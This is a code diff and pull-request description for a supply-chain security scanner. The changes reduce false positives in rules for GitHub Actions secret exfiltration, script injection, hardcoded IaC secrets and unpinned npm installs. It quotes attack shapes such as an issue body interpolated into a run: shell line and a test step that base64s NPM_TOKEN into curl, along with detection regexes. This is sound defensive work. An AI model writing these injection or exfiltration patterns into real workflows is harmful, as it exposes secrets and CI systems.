+    if (alreadyFound) continue;
+
+    pushExfilFinding(findings, relativePath, line, false);
   }
+}
+
+/** Emit a GHA_SECRET_EXFIL_MULTILINE finding. */
+function pushExfilFinding(
+  findings: Finding[],
+  relativePath: string,
+  line: number,
+  fileLevel: boolean,
+): void {
+  findings.push({
+    rule: "GHA_SECRET_EXFIL_MULTILINE",
+    description: fileLevel
+      ? "Secrets and network commands found in a workflow whose steps could not be parsed (potential exfiltration)"
+      : "A secret is in scope for the same step that runs a network command (potential exfiltration across multiple lines)",
+    severity: "high",
+    file: relativePath,
+    line,
+    recommendation:
+      "Review this step. A secret that is in scope for a step which also makes outbound network calls can be exfiltrated. " +
+      "Scope the secret to the step that needs it and keep network calls in a step without secrets.",
+  });
 }
 
 /**

--- a/src/npm-scanner.ts
+++ b/src/npm-scanner.ts
@@ -19,6 +19,7 @@ import {
   SCANNABLE_EXTENSIONS,
   MAX_FILE_SIZE,
   makeOversizedSkipFinding,
+  isPatternMatchAccepted,
 } from "./patterns.js";
 import { parseGitHubUrl } from "./github-trust-scanner.js";
 
@@ -486,6 +487,9 @@ export function scanExtractedNpmFiles(
         for (let i = 0; i < lines.length; i++) {
           const match = regex.exec(lines[i] ?? "");
           if (match) {
+            regex.lastIndex = 0;
+            // v5.18: value-level guard (see PatternEntry.valueFilter)
+            if (!isPatternMatchAccepted(pattern, match)) continue;
             findings.push({
               rule: pattern.rule,
               description: pattern.description,

--- a/src/patterns.ts
+++ b/src/patterns.ts
@@ -26,6 +26,83 @@ const SCANNER_SRC_OR_DOCS = new RegExp(
 );
 
 // ---------------------------------------------------------------------------
+// Value inspection (v5.18)
+// ---------------------------------------------------------------------------
+
+/**
+ * Apply a pattern's optional VALUE-level guard to a regex match.
+ * Returns true when the match should be reported.
+ *
+ * Every loop that iterates PatternEntry[] calls this, so a pattern's
+ * `valueFilter` can never be silently skipped by one scanner while being
+ * honoured by another.
+ */
+export function isPatternMatchAccepted(
+  pattern: Pick<PatternEntry, "valueFilter" | "valueGroup">,
+  match: RegExpMatchArray,
+): boolean {
+  if (!pattern.valueFilter) return true;
+  return pattern.valueFilter(match[pattern.valueGroup ?? 1] ?? "");
+}
+
+/**
+ * Values that are references to a secret rather than a secret: shell and
+ * make variables (`$FOO`, `${FOO}`), command substitution (`$(...)`, backticks),
+ * template expressions (`${{ ... }}`, `{{ ... }}`, `<%= ... %>`, `#{...}`),
+ * and Windows-style `%FOO%`.
+ */
+const VALUE_IS_REFERENCE =
+  /\$\{|\$\(|\$[A-Za-z_]|`|\{\{|<%|#\{|%[A-Za-z_][A-Za-z0-9_]*%/;
+
+/**
+ * A namespace/prefix template rather than a complete credential:
+ * `trust_pat_`, `sk_live_`, `ghp_`. A real credential never ends on its
+ * separator - the random part is missing because it is added at runtime.
+ */
+const VALUE_IS_PREFIX_TEMPLATE = /[_\-:./]$/;
+
+/** A filesystem path (e.g. `private_key = "/etc/ssl/private/server.key"`). */
+const VALUE_IS_PATH =
+  /^(?:\.{1,2}[\\/]|~[\\/]|[A-Za-z]:[\\/])|^\/(?:[\w.@+-]+\/)+[\w.@+-]+$/;
+
+/**
+ * Documentation placeholders. Matched as a whole word or as a prefix, never as
+ * a bare substring: `AKIAIOSFODNN7EXAMPLE` has the right shape for a real AWS
+ * key and stays reported.
+ */
+const VALUE_IS_PLACEHOLDER =
+  /^(?:test|example|dummy|sample|placeholder|changeme|change_me|your_|your-|my_|my-|todo|replace|insert|redacted|fake|notreal|mock|xxx|<)|\b(?:example|placeholder|changeme|redacted|dummy|your[_-]\w+|todo|fixme)\b/i;
+
+/** Literals that carry no secret at all. */
+const VALUE_IS_EMPTY_LITERAL = /^(?:null|none|nil|undefined|false|true|0|-)$/i;
+
+/**
+ * True when a quoted value assigned to a secret-looking key is a real embedded
+ * credential rather than a reference, a placeholder or a prefix constant.
+ *
+ * IAC_HARDCODED_SECRET used to match the assignment SHAPE alone
+ * (`token\s*=\s*"<8+ chars>"`) and never looked at the value, so it reported
+ * every one of these as a CRITICAL hardcoded secret:
+ *
+ *     password = "${REDIS_PASSWORD}"          # a shell variable
+ *     password = "$(openssl rand -base64 32)" # a freshly GENERATED password
+ *     const token = "trust_pat_"              # a namespace prefix constant
+ *
+ * The checks below are deliberately structural: each one identifies a value
+ * that CANNOT be a credential, so nothing that could be one is dropped.
+ */
+export function isLikelyRealSecretValue(value: string): boolean {
+  const v = value.trim();
+  if (v.length < 8) return false;
+  if (VALUE_IS_REFERENCE.test(v)) return false;
+  if (VALUE_IS_PREFIX_TEMPLATE.test(v)) return false;
+  if (VALUE_IS_PATH.test(v)) return false;
+  if (VALUE_IS_PLACEHOLDER.test(v)) return false;
+  if (VALUE_IS_EMPTY_LITERAL.test(v)) return false;
+  return true;
+}
+
+// ---------------------------------------------------------------------------
 // GlassWorm-specific IOCs
 // ---------------------------------------------------------------------------
 
@@ -1587,13 +1664,17 @@ export const IAC_PATTERNS: PatternEntry[] = [
   },
   {
     name: "iac-hardcoded-secret",
+    // The regex finds the assignment SHAPE; isLikelyRealSecretValue() decides
+    // whether the captured VALUE can be a credential at all (v5.18). Group 1 is
+    // the value.
     pattern:
-      '(?:password|secret_key|access_key|api_key|private_key|token)\\s*=\\s*"(?!(?:test|example|dummy|placeholder|your_|TODO|REPLACE|<|changeme|secret_here|xxx|none|null|false|true)[^"]*")[^"]{8,}"',
+      '(?:password|secret_key|access_key|api_key|private_key|token)\\s*=\\s*"(?!(?:test|example|dummy|placeholder|your_|TODO|REPLACE|<|changeme|secret_here|xxx|none|null|false|true)[^"]*")([^"]{8,})"',
     description:
       "Hardcoded secret in IaC configuration file. Secrets should use variables or secret managers.",
     severity: "critical",
     rule: "IAC_HARDCODED_SECRET",
     notTestFile: true,
+    valueFilter: isLikelyRealSecretValue,
   },
   {
     name: "iac-remote-exec",

--- a/src/policy-engine.ts
+++ b/src/policy-engine.ts
@@ -387,6 +387,11 @@ export function applyPolicy(
   const suppressEntries = policy.suppress ?? [];
   const allowedPackages = new Set(policy.allowlist?.packages ?? []);
   const allowedDomains = policy.allowlist?.domains ?? [];
+  const allowedOrgs = new Set(
+    (policy.allowlist?.githubOrgs ?? [])
+      .map((o) => o.trim().toLowerCase())
+      .filter((o) => o !== ""),
+  );
 
   const result: Finding[] = [];
 
@@ -437,6 +442,20 @@ export function applyPolicy(
       }
     }
 
+    // Allowlisted GitHub orgs: drop OWNERSHIP-trust findings whose action is
+    // owned by a trusted org. Only these two rules are attributable to an
+    // owner, and both already carry the `owner/repo@ref` reference in `match`.
+    // Pinning hygiene and known-malicious-SHA rules are deliberately NOT
+    // covered: trusting an org says who publishes the code, not that any
+    // version of it is safe.
+    if (allowedOrgs.size > 0 && ORG_ATTRIBUTED_RULES.has(finding.rule)) {
+      const owner = extractFindingActionOwner(finding);
+      if (owner && allowedOrgs.has(owner.toLowerCase())) {
+        suppressedCount++;
+        continue;
+      }
+    }
+
     // Severity overrides
     if (severityOverrides[finding.rule]) {
       finding.severity = severityOverrides[finding.rule];
@@ -453,6 +472,26 @@ export function applyPolicy(
   }
 
   return { findings: result, suppressedCount };
+}
+
+/**
+ * Findings that name a GitHub owner and are about TRUST IN THAT OWNER, so an
+ * `allowlist.githubOrgs` entry can legitimately answer them (v5.18). Before
+ * this, the key was parsed, documented and schema-validated but never read by
+ * applyPolicy() - the same silent no-op that v5.3's fail-closed philosophy
+ * exists to prevent (and that `allowlist.domains` was fixed for in v5.13).
+ */
+const ORG_ATTRIBUTED_RULES = new Set(["GHA_THIRD_PARTY_ACTION", "GHA_TAG_NOT_SHA"]);
+
+/**
+ * Extract the GitHub owner from an action-reference finding. Both rules put the
+ * full `owner/repo@ref` in `match`; the description is the fallback.
+ */
+function extractFindingActionOwner(finding: Finding): string | undefined {
+  const ref = finding.match?.trim() ?? finding.description.match(/"([^"]+\/[^"]+)"/)?.[1];
+  if (!ref) return undefined;
+  const owner = ref.split("/")[0]?.trim();
+  return owner && /^[A-Za-z0-9][A-Za-z0-9-]*$/.test(owner) ? owner : undefined;
 }
 
 /**

--- a/src/pypi-scanner.ts
+++ b/src/pypi-scanner.ts
@@ -22,6 +22,7 @@ import {
   SCANNABLE_EXTENSIONS,
   MAX_FILE_SIZE,
   makeOversizedSkipFinding,
+  isPatternMatchAccepted,
 } from "./patterns.js";
 
 const TOOL_VERSION = "1.0.0";
@@ -309,6 +310,9 @@ export function scanExtractedFiles(
       for (let i = 0; i < lines.length; i++) {
         const match = regex.exec(lines[i] ?? "");
         if (match) {
+          regex.lastIndex = 0;
+          // v5.18: value-level guard (see PatternEntry.valueFilter)
+          if (!isPatternMatchAccepted(pattern, match)) continue;
           findings.push({
             rule: pattern.rule,
             description: pattern.description,
@@ -330,6 +334,9 @@ export function scanExtractedFiles(
         for (let i = 0; i < lines.length; i++) {
           const match = regex.exec(lines[i] ?? "");
           if (match) {
+            regex.lastIndex = 0;
+            // v5.18: value-level guard (see PatternEntry.valueFilter)
+            if (!isPatternMatchAccepted(pattern, match)) continue;
             // Boost severity if found in setup.py
             const severity =
               isSetupFile && pattern.severity === "medium"
@@ -360,6 +367,9 @@ export function scanExtractedFiles(
           for (let i = 0; i < lines.length; i++) {
             const match = regex.exec(lines[i] ?? "");
             if (match) {
+              regex.lastIndex = 0;
+              // v5.18: value-level guard (see PatternEntry.valueFilter)
+              if (!isPatternMatchAccepted(pattern, match)) continue;
               findings.push({
                 rule: pattern.rule,
                 description: pattern.description,

--- a/src/scanner.ts
+++ b/src/scanner.ts
@@ -28,6 +28,7 @@ import {
   CAMPAIGN_PATTERNS_V2,
   OBFUSCATION_PATTERNS_V2,
   IAC_PATTERNS,
+  isPatternMatchAccepted,
 } from "./patterns.js";
 import { matchBareNpmIOC } from "./install-guard.js";
 import type { FeedIOC } from "./threat-intel.js";
@@ -234,15 +235,6 @@ export async function scan(options: ScanOptions): Promise<ScanReport> {
   // Load policy up front: its `ignore:` globs prune the scanner walk, and the
   // same object is reused for the suppression passes further down.
   const policy = loadPolicyConfig(scanDir);
-  if (policy?.allowlist?.githubOrgs?.length) {
-    // allowlist.githubOrgs is parsed but not yet enforced: repo-trust findings
-    // (REPO_* / trust-signals) do not currently carry the owning org, so there
-    // is nothing to attribute them to. Surface it loudly rather than letting a
-    // configured key silently do nothing (v5.3 fail-closed philosophy).
-    console.error(
-      `supply-chain-guard: policy note: allowlist.githubOrgs (${policy.allowlist.githubOrgs.length} org(s)) is parsed but not yet enforced - repo-trust findings carry no org attribution. Use rules.disable or a suppress entry for REPO_* rules if you need to silence them.`,
-    );
-  }
 
   // Collect files (v4.5: diff mode filters to changed files only)
   let allFiles = collectFiles(scanDir, options.maxDepth ?? 20);
@@ -783,6 +775,9 @@ function checkFilePatterns(
       const line = lines[i];
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,
@@ -997,6 +992,9 @@ function checkBeaconMinerPatterns(
       const line = lines[i] ?? "";
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,
@@ -1171,6 +1169,9 @@ function checkBuildToolPatterns(
       const line = lines[i] ?? "";
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,
@@ -1259,6 +1260,9 @@ function checkMonorepoPatterns(
       const line = lines[i] ?? "";
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,

--- a/src/types.ts
+++ b/src/types.ts
@@ -415,6 +415,16 @@ export interface PatternEntry {
   notFilePattern?: RegExp;
   /** If true, skip files that look like test/spec/mock/fixture files */
   notTestFile?: boolean;
+  /**
+   * Optional VALUE-level guard (v5.18). The regex decides the SHAPE of a match
+   * (`token = "..."`); this decides whether the captured VALUE is actually
+   * dangerous. Return false to drop the match. Without it a rule can only ever
+   * assert "something of this shape exists here", which is how
+   * IAC_HARDCODED_SECRET came to flag `password = "${REDIS_PASSWORD}"`.
+   */
+  valueFilter?: (value: string) => boolean;
+  /** Capture group handed to valueFilter (default 1). */
+  valueGroup?: number;
 }
 
 export interface WatchlistEntry {

--- a/src/vscode-scanner.ts
+++ b/src/vscode-scanner.ts
@@ -11,10 +11,10 @@ import * as fs from "node:fs";
 import * as os from "node:os";
 import * as path from "node:path";
 import * as https from "node:https";
-import type { Finding, ScanReport, ScanSummary, Severity } from "./types.js";
+import type { Finding, PatternEntry, ScanReport, ScanSummary, Severity } from "./types.js";
 import { SEVERITY_SCORES } from "./types.js";
 import { extractZip } from "./archive-extractor.js";
-import { FILE_PATTERNS, SCANNABLE_EXTENSIONS, MAX_FILE_SIZE, makeOversizedSkipFinding } from "./patterns.js";
+import { FILE_PATTERNS, SCANNABLE_EXTENSIONS, MAX_FILE_SIZE, makeOversizedSkipFinding, isPatternMatchAccepted } from "./patterns.js";
 
 const TOOL_VERSION = "1.0.0";
 
@@ -80,12 +80,7 @@ const SUSPICIOUS_ACTIVATION_EVENTS = [
 ];
 
 // Suspicious node APIs frequently abused in malicious extensions
-const EXTENSION_DANGER_PATTERNS: Array<{
-  pattern: string;
-  description: string;
-  severity: Severity;
-  rule: string;
-}> = [
+const EXTENSION_DANGER_PATTERNS: Array<Omit<PatternEntry, "name">> = [
   {
     pattern: "\\beval\\s*\\(",
     description: "eval() call detected in extension code",
@@ -143,12 +138,7 @@ const EXTENSION_DANGER_PATTERNS: Array<{
 ];
 
 // Patterns indicating obfuscated code
-const OBFUSCATION_PATTERNS: Array<{
-  pattern: string;
-  description: string;
-  severity: Severity;
-  rule: string;
-}> = [
+const OBFUSCATION_PATTERNS: Array<Omit<PatternEntry, "name">> = [
   {
     pattern: "(?:_0x[0-9a-fA-F]{4,}\\s*[=\\[,]\\s*){3,}",
     description: "JavaScript obfuscator variable naming pattern detected",
@@ -553,6 +543,9 @@ function checkVscodePatterns(
       const line = lines[i] ?? "";
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,
@@ -580,6 +573,9 @@ function checkObfuscationPatterns(
     const regex = new RegExp(pattern.pattern, "g");
     const match = regex.exec(content);
     if (match) {
+      regex.lastIndex = 0;
+      // v5.18: value-level guard (see PatternEntry.valueFilter)
+      if (!isPatternMatchAccepted(pattern, match)) continue;
       // Find the line number
       const beforeMatch = content.substring(0, match.index);
       const lineNumber = beforeMatch.split("\n").length;
@@ -614,6 +610,9 @@ function checkGeneralPatterns(
       const line = lines[i] ?? "";
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,

--- a/src/workflow-ast.ts
+++ b/src/workflow-ast.ts
@@ -48,6 +48,8 @@ export interface WfJob {
   line: number;
   permissions: WfPermissions;
   steps: WfStep[];
+  /** job-level `env:` map (in scope for EVERY step of this job) */
+  env?: Record<string, string>;
 }
 
 export interface WorkflowAst {
@@ -60,6 +62,8 @@ export interface WorkflowAst {
   /** top-level token permissions */
   permissions: WfPermissions;
   jobs: WfJob[];
+  /** workflow-level `env:` map (in scope for every step of every job) */
+  env?: Record<string, string>;
 }
 
 // ---------------------------------------------------------------------------
@@ -369,6 +373,8 @@ function parseJob(
       job.permissions = parsePermissions(lines, j, jobChildIndent, kv.value);
     } else if (kv.key === "steps") {
       job.steps = parseSteps(lines, j, jobChildIndent, inner);
+    } else if (kv.key === "env") {
+      job.env = parseEnvBlock(lines, j, jobChildIndent, inner);
     }
   }
   return job;
@@ -571,8 +577,103 @@ export function parseWorkflow(content: string): WorkflowAst {
       case "jobs":
         ast.jobs = parseJobs(lines, i, inner);
         break;
+      case "env":
+        ast.env = parseEnvBlock(lines, i, 0, inner);
+        break;
     }
   }
 
   return ast;
+}
+
+// ---------------------------------------------------------------------------
+// Line region classification (v5.18)
+// ---------------------------------------------------------------------------
+
+/**
+ * What a workflow line is, for rules that care about WHERE a value lands:
+ *
+ * - `exec`  - the line is part of a `run:` body (shell) or a `script:` body
+ *             (JavaScript, actions/github-script). An expression interpolated
+ *             here is substituted into the program text BEFORE it runs, so
+ *             attacker-controlled text becomes code.
+ * - `env`   - the line is part of an `env:` mapping. GitHub sets these as
+ *             process environment variables, so the value is data, never code.
+ *             This is the official mitigation for script injection.
+ * - `other` - structural YAML: `uses:`, `if:`, `with:` inputs, keys, lists.
+ */
+export type WfRegion = "exec" | "env" | "other";
+
+/** Keys whose value is EXECUTED: shell for `run:`, JavaScript for `script:`. */
+const EXEC_KEYS = new Set(["run", "script"]);
+
+/**
+ * Classify every line of a workflow file into an `exec` / `env` / `other`
+ * region (v5.18).
+ *
+ * Rules that used to match a bare regex over the whole file cannot tell the
+ * difference between the ATTACK
+ *
+ *     run: echo "${{ github.event.issue.body }}"      # injected into the shell
+ *
+ * and GitHub's own documented MITIGATION for that exact attack
+ *
+ *     env:
+ *       BODY: ${{ github.event.issue.body }}         # passed as data
+ *     run: echo "$BODY"
+ *
+ * so they flagged both. This classifier is what lets them tell the two apart
+ * while keeping exact line numbers (a full AST walk loses them).
+ *
+ * A block scalar body is treated as opaque: shell text that happens to look
+ * like YAML (`env:`, `- foo:`) never re-opens a structural region.
+ */
+export function classifyWorkflowLines(content: string): WfRegion[] {
+  const lines = content.replace(/\r/g, "").split("\n");
+  const regions: WfRegion[] = new Array<WfRegion>(lines.length).fill("other");
+  // Open block regions, innermost last. A line belongs to the innermost region
+  // whose header indent is strictly smaller than the line's own indent.
+  const stack: Array<{ region: WfRegion; indent: number }> = [];
+
+  for (let i = 0; i < lines.length; i++) {
+    const raw = lines[i]!;
+    if (raw.trim() === "") continue; // blank lines: no region, no dedent
+    const indent = indentOf(raw);
+
+    while (stack.length > 0 && indent <= stack[stack.length - 1]!.indent) stack.pop();
+    const open = stack[stack.length - 1];
+
+    if (open?.region === "exec") {
+      // Inside a run:/script: block scalar - opaque, all of it is executed.
+      regions[i] = "exec";
+      continue;
+    }
+    regions[i] = open?.region ?? "other";
+
+    const text = stripComment(raw);
+    const rest = text.slice(indent);
+    const m = /^(-\s+)?([^\s:][^:]*):(?:\s+(.*))?$/.exec(rest);
+    if (!m) continue;
+
+    // A leading "- " shifts the key's own column (`- run: |` opens at +2).
+    const keyIndent = indent + (m[1]?.length ?? 0);
+    const key = stripQuotes(m[2]!.trim());
+    const value = (m[3] ?? "").trim();
+
+    if (EXEC_KEYS.has(key)) {
+      // Block scalar header, or an inline command (whose plain-scalar
+      // continuation lines are executed too).
+      if (value !== "" && !/^[|>][0-9+-]*$/.test(value)) regions[i] = "exec";
+      stack.push({ region: "exec", indent: keyIndent });
+    } else if (key === "env") {
+      if (value === "") stack.push({ region: "env", indent: keyIndent });
+      else regions[i] = "env"; // inline flow map: env: { A: "..." }
+    } else if (value === "") {
+      // Any other block key (with:, jobs:, steps:, permissions:, ...) opens a
+      // plain region so an enclosing env: does not leak into its children.
+      stack.push({ region: "other", indent: keyIndent });
+    }
+  }
+
+  return regions;
 }


### PR DESCRIPTION
## Why

A fleet audit of 13 Elvatis products found that a large share of the reported
"risk" was scanner false positives, not real issues. The right fix is in the
rules, not in 13 suppression files.

Every rule below matched a **shape** and never looked at the **context** or the
**value**. Each is now narrowed by teaching it something it did not know, and
each keeps a true-positive test proving the attack it exists for is still
detected. New tests live in `src/__tests__/rule-precision.test.ts` (35 tests,
a true-positive AND a false-positive case per rule).

## What changed

### 1. `GHA_SECRET_EXFIL_MULTILINE` is per step, not file-level

`checkSecretsExfiltration()` kept an `envSecretsExported` flag that was
file-level and **sticky**: once any step put a secret in its `env:`, every later
run block that merely mentioned `curl` was reported. Its run-block exit test
(`lineIndent <= runBlockIndent && !/^\s+/`) could only be satisfied by a
column-0 line, so blocks never ended and the finding named whichever `run:` came
last, containing neither the secret nor (in general) the network call.

Secrets in scope are now resolved per step through the workflow AST
(step `env:` + job `env:` + workflow `env:` + the step's own `run` body), and
the finding points at the network command **inside that step**. `git fetch` is
no longer treated as egress (it pulls source in and carries no secret out).
A workflow the parser cannot split into steps still gets the old file-level
check, so nothing goes undetected.

### 2 + 3. `GHA_PPE_PULL_TARGET` and `GHA_SCRIPT_INJECTION` are context-aware

Both were bare regexes over the whole file, so both fired on

```yaml
env:
  PR_TITLE: ${{ github.event.pull_request.title }}
run: echo "$PR_TITLE"
```

which is the mitigation GitHub documents and that **this scanner's own
`GHA_SCRIPT_INJECTION` recommendation text tells users to apply**.

`classifyWorkflowLines()` (new, in `workflow-ast.ts`) labels every line
`exec` (a `run:` shell body or a github-script `script:` body), `env:` or
structural, keeping exact line numbers. Both rules now consider `exec` lines
only. PPE additionally requires the elevated context it is named for
(`pull_request_target`, `workflow_run`, `issue_comment`,
`pull_request_review_comment`), a reusable `workflow_call` whose caller may be
privileged, or an unreadable trigger block. Interpolating PR context in a plain
`pull_request` job gains an attacker nothing: that job already runs their code
with a read-only token and no secrets.

The `env:` hop is **not** a bypass: a value moved into `env:` and read back with
`${{ env.NAME }}` (rather than the shell's `$NAME`) is still template
interpolation and is still reported, at the line that reads it back.

### 4. `IAC_HARDCODED_SECRET` inspects the value

It matched `token = "<8+ chars>"` and never asked what the value was. All three
of these were CRITICAL "hardcoded secrets" in real repositories:

```
password = "${REDIS_PASSWORD}"            # a shell variable
password = "$(openssl rand -base64 32)"   # a password being GENERATED
const token = "trust_pat_"                # a namespace prefix constant
```

`PatternEntry` gained an optional `valueFilter` (honoured by every pattern loop,
so no scanner can silently skip it), and this rule uses one that rejects
variable references, command substitutions, template expressions, prefix
templates, filesystem paths and documentation placeholders. The checks are
structural: each identifies a value that *cannot* be a credential.

### 5. `DOCKER_NPM_GLOBAL` fires on unpinned installs only

Its recommendation said "pin the global package version" while the rule flagged
`RUN npm install -g pnpm@9` and `RUN npm install -g npm@11.18.0`, which are
pinned (27 such findings in one repo). It now parses the package specs and
reports only when one is unversioned, a dist-tag (`@latest`) or a range (`@^9`),
and covers the `npm i` / `npm add` / `--location=global` spellings. This repo's
own `DOCKER_NPM_GLOBAL` suppression is deleted: the rule no longer needs one.

### 6. `allowlist.githubOrgs` is enforced

Parsed, documented and schema-validated, but never read by `applyPolicy()`, so a
security config silently did nothing (it only printed a stderr note on one code
path). It now suppresses the ownership-trust findings (`GHA_THIRD_PARTY_ACTION`,
`GHA_TAG_NOT_SHA`) for actions owned by an allowlisted org. Pinning and
known-malicious-SHA rules stay armed: trusting a publisher says who ships the
code, not that every version of it is safe.

## False-negative proof

Every narrowed rule keeps a test for the real attack:

| Rule | True positive that still fires |
| --- | --- |
| `GHA_SECRET_EXFIL_MULTILINE` | step with `env: NPM_TOKEN: ${{ secrets.NPM_TOKEN }}` that base64s it into `curl -d`; plus the job-level `env:` variant |
| `GHA_PPE_PULL_TARGET` | `${{ github.event.pull_request.head.sha }}` in a `run:` block on `pull_request_target` (the atlas pattern), the `issue_comment` variant, the `${{ env.X }}` hop, unknown triggers, and `workflow_call` |
| `GHA_SCRIPT_INJECTION` | PR title in `run:`, issue body inside a github-script `script:` body, and the `${{ env.X }}` hop |
| `IAC_HARDCODED_SECRET` | `password = "Pr0dDbP4ss!7xQ"` in a `.tf` file; `sk_live_...`, `AKIA...`, `ghp_...` literals |
| `DOCKER_NPM_GLOBAL` | `npm install -g some-package`, `@latest`, `@next`, `@^9.1.0`, `@9.x`, mixed pinned+unpinned, `npm i -g` / `npm add --global` |
| `allowlist.githubOrgs` | a `GHA_KNOWN_MALICIOUS_SHA` for an allowlisted org is NOT suppressed |

The pre-existing suites for these rules (`github-actions-scanner.test.ts`,
`github-actions-cordyceps.test.ts`) are unchanged and still pass, including the
`pull_request_target` PPE test and the issue-body / comment-body injection tests.

## Verification

- `npx vitest run`: **1403 passed**, 82 files. The only failures are the 14
  pre-existing `vscode-scanner.test.ts` tests that shell out to `zip`, which is
  absent on this Windows box; the identical 14 fail on a pristine checkout of
  `main` (they are green in Linux CI).
- `npx tsc --noEmit`: clean.
- Self-scan (`node dist/cli.js scan .`): **0 findings, risk 0/100**, exit 0,
  with the `DOCKER_NPM_GLOBAL` suppression removed.
- `npm run check:aahp`, `check:feed`, `check:handoff`: all green.
- Measured against the released v5.17.9 binary on 7 real repositories
  (AEGIS, netos, elvatis-trust, atlas, elvatis-sso, elvatis-defense,
  elvatis-homepage): **128 -> 92 findings, 10 -> 1 criticals**. Everything
  removed belongs to a confirmed false-positive class; the four deploy-workflow
  exfil findings were kept and only moved to the correct line.

## Not fixed, reported for a decision

Other rules with the same anti-pattern (a bare regex over a whole file):

- `WORKFLOW_SECRET_TO_UPLOAD_PATH` (`workflow-modeler.ts:52-56`): three
  `.test(content)` regexes; `https?://` **anywhere** in the file counts as
  network egress, and `release|publish|deploy` anywhere makes it a release path.
- `VIDAR_WALLET_THEFT` (`patterns.ts`): the unbounded `.*` between the wallet
  name and the file-type word matched "phantom" to "seed" across a 20 KB
  single-line JSON handoff manifest.
- `TYPOSQUAT_LEVENSHTEIN`: `"pino"` reported as 2 edits from `"sinon"`, 14x in
  one repo.
- `SECRETS_PRIVATE_KEY`: matches the PEM header only, so it fired on a
  `MOCK-KEY-REPLACE-IN-PRODUCTION` literal. Left armed on purpose: a PEM header
  in committed source is worth a look, and this is the rule where a false
  negative would hurt most.

## Notes

No version bump and no release heading: `## [Unreleased]` carries the entry.
